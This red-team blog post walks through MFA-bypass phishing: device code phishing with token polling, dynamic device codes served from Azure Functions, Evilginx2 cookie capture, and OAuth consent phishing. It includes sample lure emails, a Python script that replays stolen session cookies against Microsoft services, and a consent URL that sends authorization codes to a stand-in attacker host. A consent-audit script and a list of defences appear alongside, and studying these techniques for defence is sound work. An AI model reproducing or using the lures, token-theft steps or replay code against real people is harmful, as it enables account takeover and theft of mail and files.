Mastering Modern Red Teaming Infrastructure Part 7: Advanced Phishing Techniques for 2FA Bypass: Device code phishing, dynamic device codes phishing, Consent phishing and Evilginx
With organizations heavily relying on MFA/2FA for protection, red teamers and threat actors have adapted.
They no longer just steal passwords — they steal access by hijacking tokens, abusing OAuth flows, and bypassing 2FA completely.
In Part 7 of the “Mastering Modern Red Teaming Infrastructure” series, I will walk you through practical 2FA bypass attacks that simulate real-world adversaries, including Device Code Phishing, Dynamic Device Code Flows, Consent and Permissions Attacks, and Evilginx2-based Session Hijacking.
Each technique includes a clear step-by-step flow based on modern offensive tradecraft.
Table of Contents
- Device Code Phishing — Static Approach
- Evilginx2 — Man-in-the-Middle Phishing with Session Hijacking
- Dynamic Device Code Phishing — Live Code Phishing
- Consent and Permissions Phishing (OAuth Consent Grant)
- Why These Attacks Work
- Real-World APT Examples: Who Uses These Techniques?
- Final Thought
1. Device Code Phishing — Static Approach
Concept: abuse the OAuth 2.0 Device Authorization Grant (RFC 8628) to obtain the victim's tokens without ever handling a password.
Device Code Phishing works because the device code flow splits authorization across two machines: the client that asked for the code and the browser that approves it. The attacker requests a device code and user code for a legitimate public client, then convinces the victim to visit the provider's real verification page, such as Microsoft's microsoft.com/devicelogin or Google's google.com/device, and enter that user code. The victim signs in and approves the code on the genuine page, MFA prompt included; the attacker, polling the token endpoint with the matching device code, receives the victim's access and refresh tokens.
This defeats MFA-based protections not by breaking MFA but by sidestepping it: the victim completes the entire sign-in on the provider's own domain, so there is no spoofed login page for the user or a URL filter to spot, and the tokens still land with the attacker.
⚡ Microsoft Warning:
In February 2025, Microsoft issued a strong caution regarding Storm-2372, an active APT group conducting widespread Device Code Phishing campaigns targeting Microsoft 365 users. (Source)
Microsoft emphasized that this technique is rapidly growing among APTs because it abuses legitimate device login workflows and stealthily bypasses MFA.
Device Code Phishing is no longer theoretical; it is now widely exploited in the wild by advanced threat actors for gaining persistent access to cloud environments without raising standard alerting mechanisms.
Steps:
1.1 Initiate Device Code Request (I will use the TokenTactics tool): request a device code for the client ID you are impersonating and note the user_code, device_code and expiry it returns.

1.2. Send Phishing Email
- Email the user a link to https://microsoft.com/devicelogin
- Instruct the user to enter the user_code returned in step 1.1 (here the code is LCSDQKUPQ). The code is issued to you by Microsoft, not chosen by you, and it expires, typically after 15 minutes, so the lure has to land while the code is still valid.
1.3. Poll for Authentication
While the lure is out, keep polling the token endpoint with your device_code. Each poll answers authorization_pending until the victim has signed in and approved the code; the next poll then returns an access token (and a refresh token if offline_access was requested).

1.4. Access Victim’s Resources
Use the stolen token to call the Microsoft Graph API and read the victim's mail (Outlook), OneDrive, Teams, SharePoint and other company user PII.
You can use my tool on GitHub, or another, to search and download a victim’s Office 365 emails with their stolen access token.

Note: this assumes the token carries the Mail.Read or Mail.ReadWrite scope; decode the scp claim of the access token to check before you call Graph. Always ensure you have proper authorization when using Microsoft Graph.
2. Evilginx2 — Man-in-the-Middle Phishing with Session Hijacking
Concept: reverse-proxy the real login page to the victim and silently capture the credentials and session cookies that pass through it.
✅ Result: full session hijack against push, SMS and TOTP second factors. Origin-bound FIDO2/WebAuthn authenticators and passkeys are not affected: the browser refuses to sign a challenge for the phishing domain, so the proxied login fails at the second factor.
Steps:
2.1 Open Evilginx2
2.2 Configure your domain, external IP and hostname in Evilginx2
2.3 Enable the Office 365 phishlet and create a lure (landing page); list the lures to get the phishing URL.
2.4 Send the victim an email or SMS with a link to the Evilginx landing page (https://login.online-notifications.net/kVQhKKxf) and wait for them to open it.
2.5 After the victim completes authentication, 2FA prompt included, their email address, password and session cookies arrive on the Evilginx backend.
2.6 Replay Session: I inject the victim's cookies into a browser and open their account portal or Azure services.
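Step 2.6 in code, as an added example that is not part of the original post or of Evilginx itself: it loads a captured cookie export into Python's http.cookiejar so that only cookies a browser would actually send (matching host and path, https for Secure cookies, not yet expired) are attached to a request. The sample export is constructed; its EditThisCookie-style shape is assumed and the cookie values are placeholders.

```python
"""Replay a captured session (step 2.6) from a cookie export: load the cookies into an
http.cookiejar so that only cookies a browser would send (matching domain and path,
https for Secure ones, not yet expired) are attached to each request."""
import http.cookiejar
import json
import time
import urllib.request

# Constructed sample in the EditThisCookie-style JSON that Evilginx prints for a captured
# session; the shape is assumed here and the values are placeholders, not real tokens.
SAMPLE_EXPORT = json.dumps([
    {"domain": "login.microsoftonline.com", "hostOnly": True, "httpOnly": True,
     "name": "ESTSAUTH", "path": "/", "secure": True, "session": True, "value": "AAAA-placeholder"},
    {"domain": "login.microsoftonline.com", "hostOnly": True, "httpOnly": True,
     "name": "ESTSAUTHPERSISTENT", "path": "/", "secure": True, "session": False,
     "expirationDate": 4102444800, "value": "BBBB-placeholder"},
    {"domain": ".microsoftonline.com", "hostOnly": False, "httpOnly": False,
     "name": "stsservicecookie", "path": "/", "secure": True, "session": False,
     "expirationDate": 1000000000, "value": "stale"},   # expired in 2001: must not be replayed
])


def load_cookie_export(export_json, now=None):
    """Parse the export into a CookieJar; returns (jar, names of cookies dropped as expired)."""
    now = time.time() if now is None else now
    jar = http.cookiejar.CookieJar()
    dropped = []
    for c in json.loads(export_json):
        expires = None if c.get("session") else int(c.get("expirationDate", 0)) or None
        if expires is not None and expires <= now:
            dropped.append(c["name"])
            continue
        domain = c["domain"]
        jar.set_cookie(http.cookiejar.Cookie(
            version=0, name=c["name"], value=c["value"],
            port=None, port_specified=False,
            domain=domain, domain_specified=True, domain_initial_dot=domain.startswith("."),
            path=c.get("path", "/"), path_specified=True,
            secure=bool(c.get("secure")), expires=expires, discard=bool(c.get("session")),
            comment=None, comment_url=None,
            rest={"HttpOnly": None} if c.get("httpOnly") else {}))
    return jar, dropped


def cookie_header_for(jar, url):
    """The Cookie header a browser holding this jar would send to url, or None if nothing
    matches (wrong host, http:// for a Secure cookie, expired)."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def replay_session(jar, url):
    """Live use: open url with the captured cookies attached; the jar also keeps any
    cookies the server sets in reply, as a browser would."""
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    return opener.open(url, timeout=30)


if __name__ == "__main__":
    jar, dropped = load_cookie_export(SAMPLE_EXPORT)
    print("dropped as expired:", dropped)
    for url in ("https://login.microsoftonline.com/", "https://outlook.office.com/mail/",
                "http://login.microsoftonline.com/"):
        print(url, "->", cookie_header_for(jar, url))
```

The point of going through a cookie jar rather than pasting a Cookie header by hand is that the jar applies the same scoping rules the victim's browser did: a cookie for login.microsoftonline.com is never sent to outlook.office.com, a Secure cookie is never sent over plain http, and an expired cookie is dropped before it can trigger a re-authentication prompt that would burn the session.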

3. Dynamic Device Code Phishing — Live Code Phishing
Traditional Device Code Phishing sends a static user_code to the target and relies on them acting before it expires (typically within 15 minutes).
Dynamic Device Code Phishing improves on this by generating the user_code only when the user clicks the phishing link, so the code is always fresh, which dramatically increases the success rate.
Setting up Dynamic Device Code Phishing takes a while, so I will summarize it:
- Deploy a static website (e.g., using Azure Static Web Apps) that fetches a fresh device_code and user_code via an API call when visited.
- The website sends the device_code to an HTTP-triggered Function App inside the attacker's Azure tenant (nomoreoil.onmicrosoft.com).
- The Function App keeps polling the token endpoint for that device_code and automatically requests the access tokens once the victim authenticates.
- On success, the tokens are saved to a Storage Account Table for later retrieval.
Example Infrastructure Setup:
3.1 Static Website — Hosts the phishing page and uses jQuery to fetch device codes dynamically.
3.2 Function App — Handles device code monitoring and token harvesting using PowerShell.
3.3 Storage Account — Stores the captured access tokens securely.
This method ensures the phishing operation remains valid for longer, maximizing the window of opportunity to capture valid tokens.
4. Consent and Permissions Phishing (OAuth Consent Grant)
In a Consent Phishing attack, instead of stealing the user’s credentials, the attacker tricks the user into granting OAuth permissions to a malicious application, allowing the attacker direct access to the user’s account data.
⚡ Recent Incidents:
In April 2025, major cybersecurity reports highlighted Russian APT groups exploiting Microsoft OAuth frameworks for large-scale espionage operations:
The Hacker News reported that the attackers abused legitimate Microsoft OAuth 2.0 workflows, social-engineering users into handing over authorization codes, which gave them access to Microsoft 365 data without the credential theft that normal detections look for. (Source)
Volexity’s detailed analysis described how threat actors phished for OAuth codes and abused Microsoft’s Device Code flow and OAuth workflows to maintain stealthy, persistent access inside cloud environments. (Source)
Consent and Permissions Phishing is extremely dangerous because the granted refresh token keeps working after password resets and the usual incident response actions; access only stops when the consent grant (and with it the app's refresh tokens) is revoked.
How the Attack Works (Example Flow)
4.1 Attacker registers a malicious app in Azure AD (or Google Cloud / any OAuth provider).
- Example: “SecureMail Reader” or “Company Document Viewer”.
4.2 Attacker crafts a malicious OAuth Consent URL like this:
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?
client_id=ATTACKER_APP_ID
&response_type=code
&redirect_uri=https://attacker-website.com/callback
&response_mode=query
&scope=Mail.Read%20offline_access%20User.Read
&state=random_state_value
Key parts:
- client_id = the attacker's app ID
- scope = sensitive permissions such as Mail.Read, offline_access, Files.Read, User.Read
- redirect_uri = the attacker's server, which receives the authorization code
4.3 Victim receives a phishing email like:
“You need to authorize SecureMail Reader to continue accessing your company emails securely. Click here to approve.”
4.4 Victim clicks the link and sees a genuine Microsoft or Google OAuth consent screen requesting the permissions (the app registration is real; only its owner is malicious).
4.5 Victim clicks “Accept” thinking it’s normal.
4.6 Attacker receives an OAuth authorization code at the redirect_uri, exchanges it for an access token (plus a refresh token, since offline_access was granted), and can now:
- Read all the victim’s emails (Mail.Read)
- Access OneDrive files (Files.Read)
- Read profile information (User.Read)
- Refresh tokens silently (offline_access)
⚡ No need for username or password — just abuse the granted access token.
Realistic Example Scenario
- The attacker registers an app called “Work From Home Secure Portal”.
- Sends the victim an email saying:
“Due to new work-from-home policies, all employees must authorize the new Secure Portal app by clicking below.”
- The link brings them to the real Microsoft OAuth consent screen, requesting:
Mail.Read, Files.Read and offline_access
- The victim clicks “Accept” — thinking it’s legitimate.
- Attacker can now read all emails, download sensitive files, and refresh access without user interaction.
Key Techniques Used:
- Legitimate OAuth flow (no password stealing)
- Social engineering through trust (real Microsoft page)
- Abuse of permissions granted by the user (not technical vulnerabilities)
How to Defend Against It:
- Enable app consent policies: require admin approval for apps requesting risky permissions and, in Entra ID, limit user consent to verified publishers and low-impact permissions
- Restrict third-party app registrations
- Educate users about unexpected consent requests
- Monitor OAuth consent grants in the organization (the “Consent to application” audit events) and, when a malicious grant is found, revoke the grant and the app's refresh tokens; a password reset alone does not cut off its access
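The two sides of section 4 in code, as an added example that is not part of the original post: parsing the scopes out of a consent URL like the one in 4.2, and the "Monitor OAuth grants" item from the defence list, applied to consent audit events. The audit records are constructed in a trimmed-down shape of the Entra ID audit log (activityDisplayName, initiatedBy, targetResources[].modifiedProperties) with placeholder ids; the real export carries more fields. The high-risk scope list is my own triage choice, not a Microsoft classification.

```python
"""Triage OAuth consent grants (section 4): parse the scopes out of a consent URL like the
one in 4.2, and flag "Consent to application" audit events that hand a non-allow-listed
app high-risk or persistent (offline_access) permissions."""
import json
import re
from urllib.parse import parse_qs, urlparse

# Graph delegated permissions that give an app the user's mailbox, files or sites (my own triage list).
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read", "Files.Read.All", "Files.ReadWrite", "Files.ReadWrite.All",
    "Sites.Read.All", "Contacts.Read",
}
PERSISTENCE_SCOPE = "offline_access"   # yields a refresh token that outlives the session
SCOPE_RE = re.compile(r"Scope:\s*([^\]]*)")

# Constructed sample records in a trimmed-down shape of the Entra ID audit log; the real
# export carries more fields, and the id values here are placeholders.
SAMPLE_AUDIT_LOG = json.dumps([
    {"activityDisplayName": "Consent to application",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "Work From Home Secure Portal", "modifiedProperties": [
         {"displayName": "ConsentContext.IsAdminConsent", "newValue": '"False"'},
         {"displayName": "ConsentAction.Permissions",
          "newValue": '"[] => [[Id: 00000000-0000-0000-0000-000000000001, '
                      'ClientId: 00000000-0000-0000-0000-000000000002, ConsentType: Principal, '
                      'Scope: Mail.Read Files.Read offline_access]]"'}]}]},
    {"activityDisplayName": "Consent to application",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"displayName": "Microsoft Teams", "modifiedProperties": [
         {"displayName": "ConsentContext.IsAdminConsent", "newValue": '"True"'},
         {"displayName": "ConsentAction.Permissions",
          "newValue": '"[] => [[Id: 00000000-0000-0000-0000-000000000003, '
                      'ConsentType: AllPrincipals, Scope: openid profile User.Read]]"'}]}]},
    {"activityDisplayName": "Add service principal",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"displayName": "Some Other App", "modifiedProperties": []}]},
])


def classify_scopes(scopes):
    """Split a set of scopes into the parts that drive the decision."""
    scopes = set(scopes)
    return {"high_risk": sorted(scopes & HIGH_RISK_SCOPES),
            "persistent": PERSISTENCE_SCOPE in scopes,
            "other": sorted(scopes - HIGH_RISK_SCOPES - {PERSISTENCE_SCOPE})}


def parse_consent_url(url):
    """Extract client_id, redirect_uri and classified scopes from an authorize URL."""
    q = parse_qs(urlparse(url).query)
    return {"client_id": q.get("client_id", [None])[0],
            "redirect_uri": q.get("redirect_uri", [None])[0],
            "scopes": classify_scopes(" ".join(q.get("scope", [])).split())}


def _property(record, name):
    """Value of a modifiedProperties entry, unwrapped from its JSON-string quoting."""
    for target in record.get("targetResources", []):
        for prop in target.get("modifiedProperties", []):
            if prop.get("displayName") == name:
                return prop.get("newValue", "").strip('"')
    return ""


def consent_scopes(record):
    """The scopes granted by a 'Consent to application' record (empty set if not parseable)."""
    m = SCOPE_RE.search(_property(record, "ConsentAction.Permissions"))
    return set(m.group(1).split()) if m else set()


def find_risky_consents(audit_json, app_allowlist=frozenset()):
    """Return one finding per consent grant that is worth an analyst's time."""
    findings = []
    for rec in json.loads(audit_json):
        if rec.get("activityDisplayName") != "Consent to application":
            continue
        app = rec.get("targetResources", [{}])[0].get("displayName", "<unknown app>")
        if app in app_allowlist:
            continue
        scopes = classify_scopes(consent_scopes(rec))
        if not (scopes["high_risk"] or scopes["persistent"]):
            continue
        reasons = []
        if _property(rec, "ConsentContext.IsAdminConsent").lower() != "true":
            reasons.append("granted by the user, not an admin")
        if scopes["high_risk"]:
            reasons.append("high-risk scopes: " + " ".join(scopes["high_risk"]))
        if scopes["persistent"]:
            reasons.append("offline_access: refresh token survives a password reset until the grant is revoked")
        findings.append({"app": app, "scopes": scopes, "reasons": reasons,
                         "user": rec.get("initiatedBy", {}).get("user", {}).get("userPrincipalName")})
    return findings


if __name__ == "__main__":
    print(json.dumps(parse_consent_url(
        "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ATTACKER_APP_ID"
        "&response_type=code&redirect_uri=https://attacker-website.com/callback"
        "&scope=Mail.Read%20offline_access%20User.Read"), indent=2))
    for finding in find_risky_consents(SAMPLE_AUDIT_LOG, {"Microsoft Teams"}):
        print(json.dumps(finding, indent=2))
```

The allow-list is deliberately the only thing that silences a grant: a user consent for Mail.Read plus offline_access to an app nobody has vetted is exactly the "Work From Home Secure Portal" scenario above, and it should surface even when the app name looks corporate.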
Why These Attacks Work
Modern identity systems trust tokens more than passwords:
- Once a session token is issued after 2FA, it’s treated as valid until expiry.
- OAuth apps are often trusted too much (users rarely read scopes carefully).
- Defenders monitor logins — but not always app grants or token theft.
Thus, post-authentication artifacts are the new target.
Real-World APT Examples: Who Uses These Techniques?
Advanced threat actors and APT groups are increasingly adopting phishing techniques that bypass traditional MFA through OAuth abuse, session hijacking, and advanced cloud-targeted methods. Some real-world examples include:
- In February 2025, Storm-2372 (Microsoft naming) conducted device code phishing against Microsoft 365 users to bypass MFA and gain persistent cloud access without needing user passwords.
- In April 2025, Russian hackers exploited Microsoft OAuth applications by registering rogue apps and phishing users for consent grants, bypassing passwords, MFA, and traditional detection.
- APT29 (Cozy Bear), known for consent and permissions phishing in campaigns against government and healthcare sectors, including the 2020 SolarWinds-related operations.
- Midnight Blizzard (Microsoft's name for the same group, formerly tracked as Nobelium) conducted sophisticated OAuth consent phishing campaigns, creating rogue apps to harvest emails, files and cloud resources.
- Unattributed Threat Actors—Regular use of Evilginx2 and similar MITM phishing kits to steal session cookies from executives (C-level) in fintech, technology, and defense sectors.
- Crimson Kingsnake — Utilized dynamic device phishing tactics, impersonating legal and financial brands to execute advanced BEC (Business Email Compromise) attacks, bypassing MFA protections.
These real-world cases show that advanced phishing campaigns are no longer rare — they are an essential part of modern APT initial access toolkits, especially against cloud-first and hybrid organizations.
Final Thought
Mastering modern phishing attacks requires more than spoofed login pages.
As organizations continue their journey into cloud ecosystems, adversaries are shifting their tactics to attack identity, sessions, and user trust rather than just passwords.
Techniques like Device Code Phishing and Consent Grant Attacks expose the weakness of relying solely on MFA, while Evilginx2 demonstrates the dangerous potential of live session hijacking.
For defenders and red teams alike, understanding and simulating these attack paths is crucial to building true resilience against modern threats.
Next: Eyes open — we dive deeper into the shadows, shifting from 2FA bypasses into hardcore credential theft, unleashing Browser-in-the-Browser (BitB) illusions, Click-Fix exploits, and Captcha Copy-Paste traps in Part 8.
If you find this blog useful, don’t forget to hit the clap button and follow the blog.
Certifications:
OSEC3, CRTL, CRTO, OSCP, OSEP, OSWE, OSED, eMAPT … Others
Follow me on LinkedIn & Twitter(X) to stay updated and to know new things.
Bye Bye, Take Care.